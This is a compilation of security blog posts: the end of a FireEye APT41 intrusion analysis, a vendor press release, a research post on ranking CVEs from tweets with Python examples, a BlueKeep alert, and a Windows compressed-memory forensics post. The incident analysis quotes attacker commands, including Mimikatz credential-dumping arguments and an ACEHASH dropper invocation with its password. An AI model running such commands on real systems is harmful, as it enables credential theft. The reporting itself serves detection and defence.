  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.

Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and on the system, the attacker ran the command

c64.exe "9839D7F1A0 -m"

This specific command provided a password of “9839D7F1A0” to decrypt the contents of, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.


Signature Name

  • China Chopper
  • Certutil Downloader

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.


Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

GRA Quantum Launches Comprehensive Security Services

Global cybersecurity firm GRA Quantum announces the launch of its comprehensive offering, Scalable Security Suite, providing solutions based on a combination of Managed Security Services and professional services, tailored to the specific needs of each client. Scalable Security Suite was created to give small to mid-sized organizations a running start when it comes to security, providing the same standard of security controls as large enterprises.

According to GRA Quantum’s President Tom Boyden, “Small and medium-sized firms are prime targets for cybercrime, but many don’t have the necessary resources or guidance to properly strengthen their security stance.  Our Scalable Security Suite is designed to help these organizations prioritize their greatest vulnerabilities and provide them a security solution that aligns with their business needs and evolves as these needs and the threat landscapes change.”

Managed Security Services (MSS), launched in December 2018, is the foundation of Scalable Security Suite. Through comprehensive security assessments, GRA Quantum experts identify vulnerabilities and provide recommendations for a custom combination of professional service offerings to best address these vulnerabilities. Professional services can be added to Managed Security Services to overcome vulnerabilities and build a more comprehensive, proactive security program.

Jen Greulich, GRA Quantum’s Director of Managed Security Services, has seen the need arise among current MSS clients for these supplemental services. “Oftentimes, it becomes clear in a scoping call that clients’ needs extend beyond what we offer through MSS. Our new flexible offering allows us to work with the clients to develop a custom security solution for them that complements MSS, whether they need incident response or penetration testing services.”

Aligned with GRA Quantum’s mission, Scalable Security Suite goes beyond the ordinary cyber assessment to understand and remediate acute physical and human-centric vulnerabilities as well.

To learn more about Scalable Security Suite, visit us on our website or begin to build your cybersecurity strategy with The Complete Guide to Building a Cybersecurity Strategy from Scratch.

The post GRA Quantum Launches Comprehensive Security Services appeared first on GRA Quantum.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities


If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified, they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerability Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring, and broader expert consensus, which can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system also rates too many vulnerabilities as severe, which causes user fatigue.

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, but the current process often delays them, which hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2016, a massive number of vulnerable IoT devices were compromised, leading to the largest Distributed Denial of Service (DDoS) attack on the internet at the time.

Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.

Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated with CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if the tweet contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or do exist, but that they are also publicly available.
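
The tweet-to-CVE association rule can be sketched in a few lines of Python. The regular expression follows the CVE ID format (a four-digit year plus a sequence number of four or more digits); url_contents is a hypothetical stand-in for text already fetched from the tweet’s links, and the separate security-relevance classifier is not shown.

```python
import re
from typing import Iterable, Optional, Set

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)


def extract_cves(text: str) -> Set[str]:
    """Return the set of CVE IDs mentioned in text, normalized to upper case."""
    return {match.group(0).upper() for match in CVE_RE.finditer(text)}


def associate_tweet(tweet_text: str, url_contents: Iterable[str] = ()) -> Optional[str]:
    """Return the single CVE a tweet refers to, or None if zero or several are found.

    CVEs are collected from the tweet body and from the text of any linked pages.
    """
    cves = extract_cves(tweet_text)
    for page in url_contents:
        cves |= extract_cves(page)
    return next(iter(cves)) if len(cves) == 1 else None
```

Tweets that mention several CVEs are dropped rather than split, which keeps each score attributable to one vulnerability at the cost of some coverage.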

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods for extracting features from text: (1) N-gram features, and (2) word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-grams or word triples for 3-grams. In other words, they are contiguous sequences of n words from a text. After we extract these n-grams, we can represent the original text as a bag-of-ngrams. Consider the sentence:

A critical vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.
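A bag-of-ngrams can be built with a counter over sliding windows of tokens. The sketch below assumes a simple word tokenizer that drops trailing punctuation; calling it with n = 2, 3, and 4 would yield the kind of token sequences the logistic regression model described later in this post consumes.

```python
import re
from collections import Counter

def bag_of_ngrams(text, n):
    """Count contiguous n-word sequences in `text` using a simple word tokenizer."""
    tokens = re.findall(r"[\w'-]+", text)
    return Counter(" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1))

bigrams = bag_of_ngrams("A critical vulnerability was found in Linux.", 2)
print(sorted(bigrams))
# ['A critical', 'critical vulnerability', 'found in', 'in Linux', 'vulnerability was', 'was found']
```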

Word embeddings learn the meaning of a word from how it was used in previous contexts and then represent that meaning in a vector space. In other words, an embedding knows a word by the company it keeps, an idea more formally known as the distributional hypothesis. These representations are machine friendly, and similar words are often assigned similar vectors. Word embeddings are also domain specific, so in our work we additionally train embeddings on terminology specific to cyber security, such as words related to threats and defenses: cyberrisk, cybersecurity, threat, and iot-based. The embeddings allow a classifier to implicitly combine knowledge of similar words with the ways in which concepts differ. Conceptually, they may help a classifier implicitly associate relationships such as:

device + infected = zombie

where an entity (device) that has a mechanism applied to it (infected, meaning malicious software has infected it) becomes a zombie.
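The relationship above can be illustrated with vector arithmetic: add the vectors for "device" and "infected" and look for the closest remaining word by cosine similarity. The three-dimensional vectors below are invented purely for illustration; real embeddings are learned from a corpus and have far more dimensions, and a classifier uses them implicitly rather than through an explicit lookup like this.

```python
import math

# Toy vectors invented for illustration only (not learned embeddings).
TOY_EMBEDDINGS = {
    "device":   [1.0, 0.0, 0.0],
    "infected": [0.0, 1.0, 0.0],
    "zombie":   [1.0, 1.0, 0.1],
    "server":   [1.0, 0.0, 0.1],
    "malware":  [0.0, 1.0, 0.2],
}

def cosine(u, v):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v)))

def nearest_to_sum(words, embeddings):
    """Vocabulary word (excluding the inputs) closest to the sum of the input vectors."""
    total = [sum(dims) for dims in zip(*(embeddings[w] for w in words))]
    candidates = (w for w in embeddings if w not in words)
    return max(candidates, key=lambda w: cosine(total, embeddings[w]))

print(nearest_to_sum(["device", "infected"], TOY_EMBEDDINGS))  # zombie
```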

To address the ways in which tweets differ linguistically from more formal written language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances such as less consistent capitalization, and uses stemming and normalization to account for special characters like ‘@’ and ‘#’.
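The post does not name the specific NLP software used, so the following is only a hypothetical stand-in for the kind of normalization described: it lowercases a tweet, replaces URLs and @mentions with placeholder tokens, and keeps the word behind a hashtag while dropping the ‘#’. Stemming is deliberately left out of this sketch.

```python
import re

def normalize_tweet(text):
    """Lowercase a tweet and replace Twitter-specific tokens with placeholders."""
    text = text.lower()
    text = re.sub(r"https?://\S+", "<url>", text)  # links (handled first so '#' in URLs is consumed)
    text = re.sub(r"@\w+", "<user>", text)          # @mentions
    text = re.sub(r"#(\w+)", r"\1", text)           # keep the hashtag word, drop '#'
    return re.sub(r"\s+", " ", text).strip()        # collapse whitespace

print(normalize_tweet("New #RCE in @Microsoft RDP https://t.co/abc  #BlueKeep"))
# new rce in <user> rdp <url> bluekeep
```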

Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that make up named entities, such as product names, based on their context within a sentence, and it benefits from our embeddings incorporating cyber security words. Correctly identifying these entities is important to how we parse a sentence. In Figure 3, for instance, NER allows Windows 10 to be understood as an entity, while October 2018 is treated as a date. Without this ability, the text in Figure 3 might be confused with the physical notion of windows in a building.

Once named entities are identified, they are used to test whether a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity, and the classifier predicts whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering out tweets that do not contain named entities leaves only those relevant to expressing observations about a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users emphasize the importance of a vulnerability by observing their choice of words. The choice of adjectives is instrumental in allowing the classifier to capture strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude or to stress the importance of something related to a vulnerability, as in Figure 4. This magnitude often signals to the model that a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.

Figure 4: Tweet showing strong adjective use

Table 1: Log-odds ratios for words correlated with highly-severe CVEs
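The post does not state exactly how the ratios in Table 1 were computed. As an assumption, one common definition compares the smoothed odds that a tweet contains a word among severe tweets with the same odds among the other tweets; positive values mean the word is more typical of severe tweets. The sketch below uses add-alpha smoothing so that unseen words do not produce a division by zero.

```python
import math

def log_odds_ratio(word, severe_tweets, other_tweets, alpha=1.0):
    """Smoothed log-odds ratio of `word` appearing in severe vs. other tweets.

    Each tweet is a set of tokens; alpha is add-alpha smoothing.
    """
    def log_odds(tweets):
        hits = sum(1 for tokens in tweets if word in tokens)
        return math.log((hits + alpha) / (len(tweets) - hits + alpha))
    return log_odds(severe_tweets) - log_odds(other_tweets)

severe = [{"critical", "rce"}, {"critical"}, {"patch"}]
other = [{"patch"}, {"update"}, {"critical"}]
print(round(log_odds_ratio("critical", severe, other), 3))  # 0.811
```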

Finally, the processed features are evaluated with two different classifiers that output relevancy and severity scores. When a named entity is identified, all words comprising it are replaced with a single token to prevent the model from being biased toward that entity. The first model uses an n-gram approach in which sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), composed of an embedding layer, a dropout layer, and a fully connected layer, to extract features from the tweets.
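Replacing an entity with a single token might look like the sketch below. The placeholder string and the span format (half-open token index ranges, as an NER tagger might return) are assumptions for illustration rather than details from the post.

```python
def mask_entities(tokens, entity_spans, placeholder="<TARGET>"):
    """Replace each named-entity span [start, end) with a single placeholder token.

    Spans are assumed to be sorted and non-overlapping.
    """
    masked, pos = [], 0
    for start, end in entity_spans:
        masked.extend(tokens[pos:start])  # copy words before the entity
        masked.append(placeholder)        # collapse the whole entity to one token
        pos = end
    masked.extend(tokens[pos:])
    return masked

tokens = "Huge RCE bug in Windows 10 October 2018 update".split()
print(mask_entities(tokens, [(4, 6)]))
# ['Huge', 'RCE', 'bug', 'in', '<TARGET>', 'October', '2018', 'update']
```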

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from December 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple annotators had to independently agree on a label, and multiple statistical and expert-oriented techniques were used to eliminate spurious annotations. Five annotators were used for the relevancy labels and ten for the severity annotation task. Heuristics were used to remove unserious respondents, for example, annotators who disagreed with the other annotators on a majority of the tweets. A subset of tweets was expert-annotated and used to measure the quality of the remaining annotations.
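The post names only one of its filtering heuristics. A hypothetical sketch of that one: take a first majority vote per tweet, drop annotators who disagree with the majority on most of the tweets they labeled, then vote again with the remaining annotators. The data layout and the 0.5 threshold are assumptions.

```python
from collections import Counter

def majority(labels):
    """Most common label; ties go to the label seen first."""
    return Counter(labels).most_common(1)[0][0]

def aggregate_labels(annotations, min_agreement=0.5):
    """annotations: {tweet_id: {annotator_id: label}} -> {tweet_id: label}.

    Annotators who agree with the first-pass majority on fewer than
    `min_agreement` of their tweets are dropped before re-voting.
    """
    first_pass = {t: majority(list(votes.values())) for t, votes in annotations.items()}
    agree, total = Counter(), Counter()
    for t, votes in annotations.items():
        for annotator, label in votes.items():
            total[annotator] += 1
            agree[annotator] += label == first_pass[t]
    trusted = {a for a in total if agree[a] / total[a] >= min_agreement}
    result = {}
    for t, votes in annotations.items():
        kept = [label for a, label in votes.items() if a in trusted]
        if kept:  # tweets labeled only by dropped annotators get no label
            result[t] = majority(kept)
    return result
```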

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns whether tweets are relevant to a security threat, using the annotated data as ground truth. This prevents a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Specifically, 1,000 tweets were held out from the original 6,000 to evaluate the relevancy classifier, and 466 tweets were held out for the severity classifier. To measure performance, we use the Area Under the precision-recall Curve (AUC), a correctness score that summarizes the tradeoff between the two types of errors (false positives vs. false negatives), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54
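The post does not say which estimator of the area under the precision-recall curve was used. A common step-wise estimator is average precision: rank items by score and average the precision measured at each true positive. A minimal sketch under that assumption:

```python
def average_precision(scores, labels):
    """Estimate of the area under the precision-recall curve (average precision).

    scores: classifier outputs; labels: 1 for positive, 0 for negative.
    """
    ranked = sorted(zip(scores, labels), key=lambda pair: pair[0], reverse=True)
    positives = sum(labels)
    hits, total = 0, 0.0
    for rank, (_, label) in enumerate(ranked, start=1):
        if label:
            hits += 1
            total += hits / rank  # precision at this positive
    return total / positives if positives else 0.0

print(round(average_precision([0.9, 0.8, 0.7, 0.6], [1, 0, 1, 0]), 3))  # 0.833
```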

Next, we evaluate how well this approach can forecast CVSS ratings. In this evaluation, every tweet must be posted at least five days before the CVSS score is published. The severity forecast score for a CVE is defined as the maximum severity score among the tweets that are relevant to and associated with the CVE. Table 2 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, with K=100, this identifies what percentage of the 100 most severe vulnerabilities were correctly predicted. The random model would have predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.
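The per-CVE forecast described above (maximum severity over relevant tweets that precede the CVSS score by at least five days) can be sketched as follows. The tweet record layout, the placeholder CVE IDs, and the dates and scores in the usage example are all made up for illustration.

```python
from datetime import date, timedelta

def forecast_cve_scores(tweets, cvss_published, min_lead_days=5):
    """Forecast per CVE: max severity among relevant tweets posted at least
    `min_lead_days` before that CVE's CVSS score was published.

    tweets: dicts with keys "cve", "posted" (date), "relevant" (bool), "severity" (float).
    cvss_published: {cve_id: date the CVSS score was published}.
    """
    scores = {}
    for tweet in tweets:
        cve = tweet["cve"]
        if not tweet["relevant"] or cve not in cvss_published:
            continue
        if cvss_published[cve] - tweet["posted"] < timedelta(days=min_lead_days):
            continue  # posted too close to (or after) the official score
        scores[cve] = max(scores.get(cve, float("-inf")), tweet["severity"])
    return scores

def rank_cves(scores):
    """CVE IDs ordered from most to least severe forecast."""
    return sorted(scores, key=scores.get, reverse=True)

published = {"CVE-X": date(2018, 3, 10), "CVE-Y": date(2018, 3, 10)}
tweets = [
    {"cve": "CVE-X", "posted": date(2018, 3, 2), "relevant": True, "severity": 0.9},
    {"cve": "CVE-X", "posted": date(2018, 3, 8), "relevant": True, "severity": 0.99},  # only 2 days ahead
    {"cve": "CVE-Y", "posted": date(2018, 3, 1), "relevant": False, "severity": 0.95},
    {"cve": "CVE-Y", "posted": date(2018, 3, 3), "relevant": True, "severity": 0.6},
]
scores = forecast_cve_scores(tweets, published)
print(rank_cves(scores))  # ['CVE-X', 'CVE-Y']
```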

Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking vulnerabilities. To do this, we identified severe vulnerabilities with known exploits based on their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting consisted of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find that our CVE classification model is more predictive than CVSS of which vulnerabilities will have operationalized exploits. The precision scores in Table 3 show that seven of our top ten most severe CVEs and 21 of our top 100 were found to have been exploited in the wild, compared to one of the top ten and 16 of the top 100 when using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in the top K examples. Our top ten vulnerabilities included seven of the 134 (5.2%), while the CVSS scoring’s top ten included only one exploited CVE (0.7%).
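The precision and recall figures above follow directly from counting hits in the top K. The sketch below reproduces the top-ten arithmetic with placeholder IDs: seven of the ten highest-ranked CVEs belong to a set of 134 exploited CVEs.

```python
def precision_recall_at_k(ranked_cves, exploited, k):
    """Precision and recall of the top-k ranked CVEs against the set of exploited CVEs."""
    hits = sum(1 for cve in ranked_cves[:k] if cve in exploited)
    return hits / k, hits / len(exploited)

# Placeholder IDs: 7 of the top 10 ranked CVEs are among 134 exploited ones.
ranked = [f"CVE-{i}" for i in range(100)]
exploited = {f"CVE-{i}" for i in range(7)} | {f"OTHER-{j}" for j in range(127)}
precision, recall = precision_recall_at_k(ranked, exploited, 10)
print(f"precision@10 = {precision:.1f}, recall@10 = {recall:.1%}")  # precision@10 = 0.7, recall@10 = 5.2%
```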

Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model


Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that predates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before those scores are made available. Our approach incorporates a novel social sentiment component, which CVSS scores lack, and this allows our scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for more practical prioritization of software vulnerabilities, effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current CVSS scoring process is expected to be replaced by ML-based solutions with limited human involvement by October 2019. However, there is no indication that a social component will be used in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. It was originally presented at NAACL in June 2019; our paper describes this work in more detail, and it was also covered by Wired.

UPDATE: ACSC confirms potential exploitation of BlueKeep vulnerability

Thousands of Australian businesses using older Windows systems should immediately install a patch to avoid being compromised. The Australian Signals Directorate (ASD) is aware of malicious activity that indicates potential widespread abuse of the BlueKeep vulnerability, known as CVE-2019-0708, which affects older versions of Windows, including Windows Vista, Windows 7, Windows XP, Windows Server 2003, and Windows Server 2008.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump that analysts can recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort that took around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies the BlackHat USA 2019 talk by Dimiter Andonov and me, which shares the series title, and describes the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution that reduces the effort required to analyze undocumented structures.


Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team, allowing the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures could be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of using it. DFIR analysts working with memory extractions or snapshots ultimately rely on tools that must recreate the job of an API by manually parsing and traversing structures and reimplementing the algorithms involved.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. Automating the extraction of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds:

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).

Figure 1: Call to RtlDecompressBufferEx; note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. A stronger extraction algorithm, however, prepopulates ST_DATA_MGR with a known pattern (see Figure 2).

Figure 2: Known pattern copied into ST_DATA_MGR buffer
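The author's pattern helper appears only in a screenshot, so the sketch below swaps in a standard technique: a de Bruijn sequence over the 52 ASCII letters with window size 2, in which every 2-byte window occurs exactly once. Any 16-bit value read back from emulated memory therefore maps to a single offset. The helper names are hypothetical, and offsets produced with this pattern will not match the author's (for example, “Km” will not land at 0x220).

```python
import string
import struct

def de_bruijn(alphabet, n):
    """De Bruijn sequence B(k, n): each length-n string over `alphabet` appears once (cyclically)."""
    k = len(alphabet)
    a = [0] * k * n
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in sequence)

# 52 letters, 2-byte windows: 52**2 = 2704 bytes, every window unique.
PATTERN = de_bruijn(string.ascii_uppercase + string.ascii_lowercase, 2).encode("ascii")

def known_pattern(size):
    """First `size` bytes of the pattern, to copy into the emulated structure buffer."""
    if size > len(PATTERN):
        raise ValueError("requested buffer is larger than the pattern")
    return PATTERN[:size]

def field_offset(word):
    """Offset of a 16-bit value read from emulated (little-endian) memory within the pattern."""
    return PATTERN.find(struct.pack("<H", word))
```

In an emulation run, `known_pattern` would fill the buffer passed as the structure pointer, and `field_offset` would be applied to the USHORT observed as the first argument at the decompression call.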

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.

Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm works on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy, is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is used to perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.

Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful once incorporated into Volatility and Rekall. In both tools, the overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.

Figure 6: Structure definition found within overlay

Create a new profile dictionary (e.g., win10_mem_comp_x86_1903) corresponding to the Windows build you are targeting and populate the structure entries accordingly.
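One way to turn automation output into such a dictionary is sketched below. It assumes the Volatility 2 overlay convention of `[size, {field: [offset, [type]]}]`, with `None` meaning the size is not overridden; the exact layout of the overlay files in the FLARE repositories may differ, and the struct spelling and profile name here are illustrative. The only offset used is the one quoted in this series for Windows 10 1703 x86.

```python
def build_overlay(extracted_fields):
    """Collect (struct, field, offset, type) tuples into a Volatility 2-style overlay dict.

    Each struct maps to [size, {field: [offset, [type]]}]; size stays None
    because only field offsets are recorded here.
    """
    overlay = {}
    for struct_name, field, offset, vtype in extracted_fields:
        _, members = overlay.setdefault(struct_name, [None, {}])
        members[field] = [offset, [vtype]]
    return overlay

# Hypothetical 1703 x86 profile holding the single offset quoted in this series.
win10_mem_comp_x86_1703 = build_overlay([
    ("ST_DATA_MGR", "wCompressionFormat", 0x220, "unsigned short"),
])
print(win10_mem_comp_x86_1703)
# {'ST_DATA_MGR': [None, {'wCompressionFormat': [544, ['unsigned short']]}]}
```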


Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive


